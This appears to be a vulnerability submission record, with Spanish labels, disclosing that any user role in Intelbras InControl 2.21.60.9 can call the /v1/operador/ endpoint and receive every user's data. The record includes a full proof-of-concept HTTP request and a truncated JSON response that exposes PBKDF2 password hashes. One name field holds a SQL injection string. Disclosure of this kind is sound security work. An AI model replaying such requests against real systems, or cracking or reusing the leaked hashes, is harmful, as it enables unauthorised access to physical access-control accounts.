Enviar #579544: Intelbras InControl 2.21.60.9 Information Disclosure

Título: Intelbras InControl 2.21.60.9 Information Disclosure
Descripción: There is a password hash disclosure in the InControl application. There are three types of users: Admin, Recepcionista and Porteiro. Every type of user can make a GET request to the users endpoint "/v1/operador/", which lists every user registered in the application. This endpoint returns a JSON object that contains a lot of information about the users, including id, username, password (hashed) and other information. Here is an example of the GET request made with Recepcionista privileges (a role that, in the frontend, does not have permission to list users; the 200 response below shows that this restriction is enforced only in the frontend and not by the API): GET /v1/operador/ HTTP/1.1 Host: localhost:4441 Authorization: JWT eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.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.RyGjsE61f-d4QE6OWMCyp7Px_DjOEYMhmSGPIiCJzcc Accept-Language: pt-BR,pt;q=0.9 Accept: application/json, text/plain, */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36 Origin: https://localhost:4445 Referer: https://localhost:4445/ Accept-Encoding: gzip, deflate, br Priority: u=1, i Connection: keep-alive --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- And here is an example of the HTTP response with disclosure of password hashes: HTTP/1.1 200 OK Date: Fri, 16 May 2025 19:02:07 GMT Server: Apache/2.4.62 (Win32) OpenSSL/3.1.6 mod_wsgi/4.7.1 Python/3.7 Vary: Accept,Origin,Cookie Allow: GET, POST, DELETE, HEAD, OPTIONS Content-Length: 40484 Access-Control-Allow-Origin: * X-Frame-Options: SAMEORIGIN Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/json {"message":null,"data":[{"id":3,"pessoa":{"id":5,"nome_completo":"arnaldo","email":"[email 
protected]","telefone_celular":null,"telefone_residencial":null,"grupo":null,"imagem":null,"empresa":null,"tem_pendencias":false},"user":{"id":3,"username":"cesar","password":"pbkdf2_sha256$150000$O4xokjpfyafm$L1/My9lbtYx/dcJTOW45QaC2N6qWf2KtIScfaA6FCV0=","groups":{"id":3,"name":"Recepcao","permissions":[{"id":268,"codename":"view_controleremoto","content_type":{"id":67,"app_label":"credencial","model":"controleremoto"}},{"id":249,"codename":"add_historicalbiometriadigital","content_type":{"id":63,"app_label":"credencial","model":"historicalbiometriadigital"}},{"id":250,"codename":"change_historicalbiometriadigital","content_type":{"id":63,"app_label":"credencial","model":"historicalbiometriadigital"}},{"id":251,"codename":"delete_historicalbiometriadigital","content_type":{"id":63,"app_label":"credencial","model":"historicalbiometriadigital"}},{"id":252,"codename":"view_historicalbiometriadigital","content_type":{"id":63,"app_label":"credencial","model":"historicalbiometriadigital"}},{"id":181,"codename":"add_historicaleventooperador","content_type":{"id":46,"app_label":"evento_operador","model":"historicaleventooperador"}},{"id":182,"codename":"change_historicaleventooperador","content_type":{"id":46,"app_label":"evento_operador","model":"historicaleventooperador"}},{"id":183,"codename":"delete_historicaleventooperador","content_type":{"id":46,"app_label":"evento_operador","model":"historicaleventooperador"}},{"id":184,"codename":"view_historicaleventooperador","content_type":{"id":46,"app_label":"evento_operador","model":"historicaleventooperador"}},{"id":297,"codename":"add_historicalgrupopontosacesso","content_type":{"id":75,"app_label":"grupo_pontos_acesso","model":"historicalgrupopontosacesso"}},{"id":298,"codename":"change_historicalgrupopontosacesso","content_type":{"id":75,"app_label":"grupo_pontos_acesso","model":"historicalgrupopontosacesso"}},{"id":299,"codename":"delete_historicalgrupopontosacesso","content_type":{"id":75,"app_label":"grupo_pontos_aces
so","model":"historicalgrupopontosacesso"}},{"id":300,"codename":"view_historicalgrupopontosacesso","content_type":{"id":75,"app_label":"grupo_pontos_acesso","model":"historicalgrupopontosacesso"}},{"id":117,"codename":"add_campospersonalizados","content_type":{"id":30,"app_label":"usuario","model":"campospersonalizados"}},{"id":118,"codename":"change_campospersonalizados","content_type":{"id":30,"app_label":"usuario","model":"campospersonalizados"}},{"id":119,"codename":"delete_campospersonalizados","content_type":{"id":30,"app_label":"usuario","model":"campospersonalizados"}},{"id":120,"codename":"view_campospersonalizados","content_type":{"id":30,"app_label":"usuario","model":"campospersonalizados"}},{"id":129,"codename":"add_usersgroup","content_type":{"id":33,"app_label":"usuario","model":"usersgroup"}},{"id":130,"codename":"change_usersgroup","content_type":{"id":33,"app_label":"usuario","model":"usersgroup"}},{"id":131,"codename":"delete_usersgroup","content_type":{"id":33,"app_label":"usuario","model":"usersgroup"}},{"id":132,"codename":"view_usersgroup","content_type":{"id":33,"app_label":"usuario","model":"usersgroup"}}]},"is_active":true,"is_superuser":false}},{"id":2,"pessoa":{"id":4,"nome_completo":"' OR '1'='1'--","email":"[email 
protected]","telefone_celular":null,"telefone_residencial":null,"grupo":null,"imagem":null,"empresa":null,"tem_pendencias":false},"user":{"id":2,"username":"admin2","password":"pbkdf2_sha256$150000$7iR10NcRJoQY$ccO4sUbudTm2Qh+Lq66Thh1YQqvkBTOk8xxCaLugQ3E=","groups":{"id":1,"name":"Administrador","permissions":[{"id":37,"codename":"add_acaoevento","content_type":{"id":10,"app_label":"acoes_eventos","model":"acaoevento"}},{"id":38,"codename":"change_acaoevento","content_type":{"id":10,"app_label":"acoes_eventos","model":"acaoevento"}},{"id":39,"codename":"delete_acaoevento","content_type":{"id":10,"app_label":"acoes_eventos","model":"acaoevento"}},{"id":40,"codename":"view_acaoevento","content_type":{"id":10,"app_label":"acoes_eventos","model":"acaoevento"}},{"id":385,"codename":"add_alertasonoro","content_type":{"id":97,"app_label":"alerta_sonoro","model":"alertasonoro"}},{"id":386,"codename":"change_alertasonoro","content_type":{"id":97,"app_label":"alerta_sonoro","model":"alertasonoro"}},{"id":387,"codename":"delete_alertasonoro","content_type":{"id":97,"app_label":"alerta_sonoro","model":"alertasonoro"}},{"id":388,"codename":"view_alertasonoro","content_type":{"id":97,"app_label":"alerta_sonoro","model":"alertasonoro"}},{"id":45,"codename":"add_antipassbackdispositivo","content_type":{"id":12,"app_label":"antipassback","model":"antipassbackdispositivo"}},{"id":46,"codename":"change_antipassbackdispositivo","content_type":{"id":12,"app_label":"antipassback","model":"antipassbackdispositivo"}},{"id":47,"codename":"delete_antipassbackdispositivo","content_type":{"id":12,"app_label":"antipassback","model":"antipassbackdispositivo"}},{"id":48,"codename":"view_antipassbackdispositivo","content_type":{"id":12,"app_label":"antipassback","model":"antipassbackdispositivo"}},{"id":53,"codename":"add_area","content_type":{"id":14,"app_label":"area","model":"area"}},{"id":54,"codename":"change_area","content_type":{"id":14,"app_label":"area","model":"area"}},{"id":55,"codename
":"delete_area","content_type":{"id":14,"app_label":"area","model":"area"}},{"id":56,"codename":"view_area","content_type":{"id":14,"app_label":"area","model":"area"}},{"id":49,"codename":"add_historicalarea","content_type":{"id":13,"app_label":"area","model":"historicalarea"}},{"id":50,"codename":"change_historicalarea","content_type":{"id":13,"app_label":"area","model":"historicalarea"}},{"id":51,"codename":"delete_historicalarea","content_type":{"id":13,"app_label":"area","model":"historicalarea"}},{"id":52,"codename":"view_historicalarea","content_type":{"id":13,"app_label":"area","model":"historicalarea"}},{"id":321,"codename":"add_arquivo","content_type":{"id":81,"app_label":"arquivo","model":"arquivo"}},{"id":322,"codename":"change_arquivo","content_type":{"id":81,"app_label":"arquivo","model":"arquivo"}},{"id":323,"codename":"delete_arquivo","content_type":{"id":81,"app_label":"arquivo","model":"arquivo"}},{"id":324,"codename":"view_arquivo","content_type":{"id":81,"app_label":"arquivo","model":"arquivo"}},{"id":345,"codename":"add_camera","content_type":{"id":87,"app_label":"camera","model":"camera"}},{"id":346,"codename":"change_camera","content_type":{"id":87,"app_label":"camera","model":"camera"}},{"id":347,"codename":"delete_camera","content_type":{"id":87,"app_label":"camera","model":"camera"}},{"id":348,"codename":"view_camera","content_type":{"id":87,"app_label":"camera","model":"camera"}},{"id":354,"codename":"change_progressocomunicacao","content_type":{"id":89,"app_label":"comunicacao_progress","model":"progressocomunicacao"}},{"id":261,"codename":"add_assusersdkdispositivosdk","content_type":{"id":66,"app_label":"credencial","model":"assusersdkdispositivosdk"}},{"id":262,
Fuente: https://localhost:4441/v1/operador/
Usuario: lorenzomoulin (UID 33175)
Sumisión: 2025-05-16 21:07 (hace 11 meses)
Moderación: 2025-08-04 07:41 (3 months later)
Estado: Aceptado
Entrada de VulDB: 318641 [Intelbras InControl 2.21.60.9 JSON Endpoint /v1/operador/ divulgación de información]
Puntos: 20
